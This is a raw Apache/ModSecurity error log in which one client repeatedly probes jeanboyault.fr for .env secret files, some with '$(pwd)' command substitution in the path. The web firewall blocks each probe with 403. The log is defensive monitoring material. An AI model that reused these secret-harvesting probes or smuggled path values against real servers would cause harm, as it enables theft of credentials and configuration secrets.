[Mon May 11 12:44:03.424604 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:13870] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/backend/.env"] [unique_id "agGy8xjZymfuKpjWXeiPggAAAMc"]
[Mon May 11 12:44:03.424875 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:13870] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/backend/.env"] [unique_id "agGy8xjZymfuKpjWXeiPggAAAMc"]
[Mon May 11 12:44:03.471530 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:16268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGy8ZkIEwRJMyDaV55gUgAAAUk"]
[Mon May 11 12:44:04.773803 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:13874] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/backend/.env"] [unique_id "agGy9BjZymfuKpjWXeiPgwAAAMU"]
[Mon May 11 12:44:04.774019 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:13874] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/backend/.env"] [unique_id "agGy9BjZymfuKpjWXeiPgwAAAMU"]
[Mon May 11 12:44:04.895802 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:13870] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGy8xjZymfuKpjWXeiPggAAAMc"]
[Mon May 11 12:44:06.282662 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:13874] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGy9BjZymfuKpjWXeiPgwAAAMU"]
[Mon May 11 12:44:22.960190 2026] [security2:error] [pid 1254328:tid 1254344] [client 43.133.54.83:52250] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "manhattan-studio.fr"] [uri "/"] [unique_id "agGzBkRdw2n9wv6Ai48aowAAAI0"], referer: http://manhattan-studio.fr
[Mon May 11 12:44:27.043344 2026] [security2:error] [pid 1254212:tid 1254233] [client 162.14.66.219:53002] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/"] [unique_id "agGzC0YQeUtAPynIs6xrPgAAABM"], referer: http://apoe.fr
[Mon May 11 12:44:50.322219 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:12988] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /$(pwd)/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.env"] [unique_id "agGzIkRdw2n9wv6Ai48a2gAAAIc"]
[Mon May 11 12:44:50.324064 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:12988] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.env"] [unique_id "agGzIkRdw2n9wv6Ai48a2gAAAIc"]
[Mon May 11 12:44:51.494559 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:12988] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzIkRdw2n9wv6Ai48a2gAAAIc"]
[Mon May 11 12:44:51.521397 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:12998] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /(pwd)/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.env"] [unique_id "agGzI5kIEwRJMyDaV55gjAAAAUc"]
[Mon May 11 12:44:51.521866 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:12998] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.env"] [unique_id "agGzI5kIEwRJMyDaV55gjAAAAUc"]
[Mon May 11 12:44:52.769708 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:12998] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzI5kIEwRJMyDaV55gjAAAAUc"]
[Mon May 11 12:44:52.796178 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:13006] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /$(pwd)/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.env.local"] [unique_id "agGzJEYQeUtAPynIs6xrXgAAABY"]
[Mon May 11 12:44:52.796381 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:13006] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.env.local"] [unique_id "agGzJEYQeUtAPynIs6xrXgAAABY"]
[Mon May 11 12:44:53.950124 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:13006] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzJEYQeUtAPynIs6xrXgAAABY"]
[Mon May 11 12:44:53.976643 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:39998] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /(pwd)/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.env.local"] [unique_id "agGzJWS6k_SCYd1AVZrC1gAAAQ0"]
[Mon May 11 12:44:53.993302 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:39998] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.env.local"] [unique_id "agGzJWS6k_SCYd1AVZrC1gAAAQ0"]
Mon May 11 12:44:54 2026 (1305428): Fatal Error Unable to create lock file: Bad file descriptor (9)
[Mon May 11 12:44:54.584262 2026] [cgid:error] [pid 1254133:tid 1254144] [client 216.73.216.110:57337] End of script output before headers: ea-php74
Mon May 11 12:44:54 2026 (1305430): Fatal Error Unable to create lock file: Bad file descriptor (9)
[Mon May 11 12:44:54.622837 2026] [cgid:error] [pid 1254133:tid 1254144] [client 216.73.216.110:57337] End of script output before headers: ea-php74
[Mon May 11 12:44:55.022677 2026] [:error] [pid 1254328:tid 1254341] [client 51.75.116.205:60030] Mon May 11 12:44:55 2026 (1305432): Fatal Error Unable to create lock file: Bad file descriptor (9)
[Mon May 11 12:44:55.025577 2026] [core:error] [pid 1254328:tid 1254341] [client 51.75.116.205:60030] End of script output before headers: index.php
Mon May 11 12:44:55 2026 (1305433): Fatal Error Unable to create lock file: Bad file descriptor (9)
[Mon May 11 12:44:55.114608 2026] [cgid:error] [pid 1254328:tid 1254350] [client 216.73.216.110:24436] End of script output before headers: ea-php74
Mon May 11 12:44:55 2026 (1305436): Fatal Error Unable to create lock file: Bad file descriptor (9)
[Mon May 11 12:44:55.159489 2026] [cgid:error] [pid 1254328:tid 1254350] [client 216.73.216.110:24436] End of script output before headers: ea-php74
[Mon May 11 12:44:55.224531 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:39998] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzJWS6k_SCYd1AVZrC1gAAAQ0"]
[Mon May 11 12:44:55.251728 2026] [security2:error] [pid 1254242:tid 1254262] [client 185.177.72.9:40012] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /$(pwd)/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.env.production"] [unique_id "agGzJ74KNmD_mZ_vlf9NXgAAAFE"]
[Mon May 11 12:44:55.252803 2026] [security2:error] [pid 1254242:tid 1254262] [client 185.177.72.9:40012] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.env.production"] [unique_id "agGzJ74KNmD_mZ_vlf9NXgAAAFE"]
[Mon May 11 12:44:56.444812 2026] [security2:error] [pid 1254242:tid 1254262] [client 185.177.72.9:40012] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzJ74KNmD_mZ_vlf9NXgAAAFE"]
[Mon May 11 12:44:56.471420 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:40024] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /(pwd)/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.env.production"] [unique_id "agGzKEYQeUtAPynIs6xrYgAAAA8"]
[Mon May 11 12:44:56.471891 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:40024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.env.production"] [unique_id "agGzKEYQeUtAPynIs6xrYgAAAA8"]
[Mon May 11 12:44:57.689593 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:40024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzKEYQeUtAPynIs6xrYgAAAA8"]
[Mon May 11 12:44:57.715456 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:40030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /$(pwd)/.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.env.development"] [unique_id "agGzKURdw2n9wv6Ai48a5gAAAIA"]
[Mon May 11 12:44:57.717250 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:40030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.env.development"] [unique_id "agGzKURdw2n9wv6Ai48a5gAAAIA"]
[Mon May 11 12:44:58.891027 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:40030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzKURdw2n9wv6Ai48a5gAAAIA"]
[Mon May 11 12:44:58.916804 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:40046] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /(pwd)/.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.env.development"] [unique_id "agGzKhjZymfuKpjWXeiP1gAAAMs"]
[Mon May 11 12:44:58.917027 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:40046] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.env.development"] [unique_id "agGzKhjZymfuKpjWXeiP1gAAAMs"]
[Mon May 11 12:45:00.127056 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:40046] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzKhjZymfuKpjWXeiP1gAAAMs"]
[Mon May 11 12:45:00.150263 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:40058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /$(pwd)/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.env.staging"] [unique_id "agGzLGS6k_SCYd1AVZrC9gAAAQQ"]
[Mon May 11 12:45:00.150489 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:40058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.env.staging"] [unique_id "agGzLGS6k_SCYd1AVZrC9gAAAQQ"]
[Mon May 11 12:45:01.348311 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:40058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzLGS6k_SCYd1AVZrC9gAAAQQ"]
[Mon May 11 12:45:01.375451 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:40060] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /(pwd)/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.env.staging"] [unique_id "agGzLZkIEwRJMyDaV55gmAAAAUI"]
